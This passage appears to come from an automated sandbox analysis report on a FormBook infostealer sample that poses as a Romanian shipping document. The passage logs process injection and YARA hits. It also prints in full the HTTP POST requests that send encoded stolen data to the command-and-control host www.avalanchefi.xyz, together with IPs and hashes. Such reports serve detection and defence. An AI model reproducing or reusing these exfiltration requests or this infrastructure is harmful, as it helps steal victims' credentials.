77 63 6f 48 6b 6c 62 76 30 6a 73 46 7a 32 39 70 33 52 73 72 6e 5a 6e 61 41 59 62 4e 36 72 74 31 74 67 36 42 79 65 57 46 48 36 53 70 31 64 55 6a 72 79 5a 32 6a 6b 41 75 56 75 50 69 78 68 6c 64 6a 6a 36 36 42 38 33 5a 6a 35 38 72 6c 6d 36 56 43 37 44 68 45 73 49 47 64 36 48 6d 41 51 38 35 7a 6c 76 75 61 4c 67 36 4f 52 56 42 4f 76 48 49 74 58 63 76 4e 56 62 53 42 70 37 4f 34 65 5a 4c 66 4a 42 77 36 7a 74 77 57 56 78 41 49 6a 64 55 78 7a 47 6c 67 3d 3d Data Ascii: gdIlTvE8=21JNLLR6nWLwxwoFszlFoGmCfJ5h1sPV4R0pXIak1dM4UwcoHklbv0jsFz29p3RsrnZnaAYbN6rt1tg6ByeWFH6Sp1dUjryZ2jkAuVuPixhldjj66B83Zj58rlm6VC7DhEsIGd6HmAQ85zlvuaLg6ORVBOvHItXcvNVbSBp7O4eZLfJBw6ztwWVxAIjdUxzGlg==
Dec 9, 2024 13:14:39.171000957 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49849	13.248.169.48	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:40.681565046 CET	829	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 59 34 56 52 73 6f 41 68 52 62 73 30 6a 73 4f 54 33 33 32 6e 52 72 72 6e 56 56 61 42 6b 62 4e 36 76 74 31 75 30 36 41 46 43 58 48 58 36 51 79 6c 64 61 74 4c 79 5a 32 6a 6b 41 75 56 72 48 69 78 35 6c 42 44 54 36 37 67 38 30 48 7a 35 2f 6f 6c 6d 36 52 43 37 48 68 45 73 2b 47 59 69 70 6d 46 4d 38 35 33 70 76 75 4c 4c 76 77 4f 52 66 50 75 75 57 50 49 76 58 70 63 6b 4e 4b 6e 6c 38 4b 5a 43 41 4b 5a 45 62 68 4c 53 36 69 57 78 43 64 50 71 70 5a 79 4f 50 2b 71 4c 56 46 38 4c 6c 61 31 4c 63 6f 53 57 42 69 73 37 36 32 67 77 3d Data Ascii: gdIlTvE8=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vY4VRsoAhRbs0jsOT332nRrrnVVaBkbN6vt1u06AFCXHX6QyldatLyZ2jkAuVrHix5lBDT67g80Hz5/olm6RC7HhEs+GYipmFM853pvuLLvwORfPuuWPIvXpckNKnl8KZCAKZEbhLS6iWxCdPqpZyOP+qLVF8Lla1LcoSWBis762gw=
Dec 9, 2024 13:14:41.768484116 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49855	13.248.169.48	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:43.341212988 CET	10911	OUT	POST /ctta/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Origin: http://www.avalanchefi.xyz Referer: http://www.avalanchefi.xyz/ctta/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 64 49 6c 54 76 45 38 3d 32 31 4a 4e 4c 4c 52 36 6e 57 4c 77 2b 7a 67 46 72 51 4e 46 6a 47 6d 42 51 70 35 68 76 63 50 52 34 52 49 70 58 4a 50 76 30 76 41 34 55 6a 6b 6f 47 47 4e 62 74 30 6a 73 53 44 33 36 32 6e 51 75 72 6e 4d 63 61 42 6f 68 4e 34 6e 74 30 4d 73 36 49 55 43 58 4e 58 36 51 74 31 64 58 6a 72 79 32 32 6e 49 4d 75 56 37 48 69 78 35 6c 42 41 4c 36 79 52 38 30 46 7a 35 38 72 6c 6d 6d 56 43 36 53 68 45 30 41 47 5a 57 58 6d 78 41 38 35 58 35 76 39 74 66 76 7a 75 52 5a 43 4f 75 4f 50 49 71 50 70 59 38 33 4b 6e 35 61 4b 5a 6d 41 4c 74 35 59 32 34 43 47 2b 47 31 64 45 76 62 4d 64 67 33 50 77 4b 50 2f 4a 4a 71 6c 42 58 6a 30 6f 77 50 79 39 4f 58 41 76 6d 4d 63 65 6d 54 37 63 4d 6c 31 61 35 77 46 48 64 33 38 72 70 6a 62 67 66 42 2f 31 7a 6a 53 56 4e 74 2b 4d 68 6f 75 34 2f 58 57 62 4c 70 44 4a 5a 62 51 67 76 74 39 33 70 6f 49 31 30 4e 7a 31 30 4a 41 37 66 72 31 38 33 37 35 70 49 35 52 69 33 33 78 51 46 4f 46 46 39 77 78 37 57 59 75 55 37 51 4f 72 4b 55 76 47 72 6d 46 4e 79 2b 36 54 68 76 54 69 [TRUNCATED] Data Ascii: gdIlTvE8=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vA4UjkoGGNbt0jsSD362nQurnMcaBohN4nt0Ms6IUCXNX6Qt1dXjry22nIMuV7Hix5lBAL6yR80Fz58rlmmVC6ShE0AGZWXmxA85X5v9tfvzuRZCOuOPIqPpY83Kn5aKZmALt5Y24CG+G1dEvbMdg3PwKP/JJqlBXj0owPy9OXAvmMcemT7cMl1a5wFHd38rpjbgfB/1zjSVNt+Mhou4/XWbLpDJZbQgvt93poI10Nz10JA7fr18375pI5Ri33xQFOFF9wx7WYuU7QOrKUvGrmFNy+6ThvTid7sdjzbP5VX6e8DBh6PKaPJVSJPYu8/hfIk4TCHdhy7U2mqQ7W3jtL2N2HOhtAbg0feCnOo5Wb6IQvmMn6ts3jsOWBm5X+Tvg0yJnU+BB1X+NxB7MJWdfjLyuEB5u1WC2Iezle+a10gj+mD2zO0AUP0s+F10tE9TnfMlRKZ6e/PBH9BQePfAVf+fcALqh10ot87eUv2D+UW1NYGkiwMb+h6ROSv/YsgVZ6pz82TeTsPB0dzIlnkYNqAxNb3agTibzJP+1CV/3NpRM5e4rhzTG6K3slcAG10HMQwQ87zsMxPNUVxyi+d0XFY1qCYeEo4n88tZHqEWSMKk1q4/2UrfmwWkWPvxFyteE9BIfTniOPGTGjzKvpEDpo76fJBN5Exy9mfUK3V9uPw3Tn/80LdGYAm+Fd5UtP+zU0SWZiw9r/B4FZcqNgygpzVR8PXXWQ/VIWnnjicSRQ4dD3w++OIOcZS9rViUf1vET8Mcabw76RvyaEXWh9XCPFwHE8wdlMDxT5NbgqA84sPY+EKdumxc39qCoum3MvaLfW69+qNflaN0zardCB6VqNoGI30H0a84KoapSKQLZzX2YKKw9diBsL9s4bpsayeu7UdK1NhQVRm9UUTBCrDva74FODqjDJJkihYOgJKwc0kxpLn7sgK8jT0dVInq5+7REf [TRUNCATED]
Dec 9, 2024 13:14:44.426273108 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49861	13.248.169.48	80	3752	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 13:14:45.991956949 CET	543	OUT	GET /ctta/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.avalanchefi.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 13:14:47.088577032 CET	386	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 09 Dec 2024 12:14:46 GMT content-length: 265 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 48 31 44 3d 4f 34 46 58 6a 46 43 70 4a 6a 52 70 61 78 76 26 67 64 49 6c 54 76 45 38 3d 37 33 68 74 49 2f 30 37 6c 6e 62 69 36 6a 68 6a 76 6b 4e 48 72 6c 57 53 61 36 42 53 6a 73 4b 69 76 52 52 53 56 34 61 72 6b 74 35 37 58 44 6c 4b 43 32 78 4a 76 6e 61 2b 4a 6a 65 31 6e 57 64 35 6b 30 5a 33 50 53 30 56 56 5a 54 77 34 65 6b 37 4e 46 50 6f 61 67 32 2f 78 57 45 57 68 64 43 50 38 79 6f 4d 30 32 62 6f 37 52 6b 35 5a 41 4c 50 38 77 38 4f 46 69 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4="}</script></head></html>

Target ID:	0
Start time:	07:12:52
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Imagebase:	0xd00000
File size:	1'226'240 bytes
MD5 hash:	53BC8D5AEC130CB17E4F2A277B722BF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	07:12:53
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Imagebase:	0x810000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2248534012.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2248246717.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2248900268.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	07:13:44
Start date:	09/12/2024
Path:	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe"
Imagebase:	0x690000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2916213463.0000000003560000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	07:13:45
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sc.exe"
Imagebase:	0x990000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2914944914.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2916379942.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2916441443.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	07:13:58
Start date:	09/12/2024
Path:	C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe"
Imagebase:	0x690000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2915999242.0000000001630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	07:14:10
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true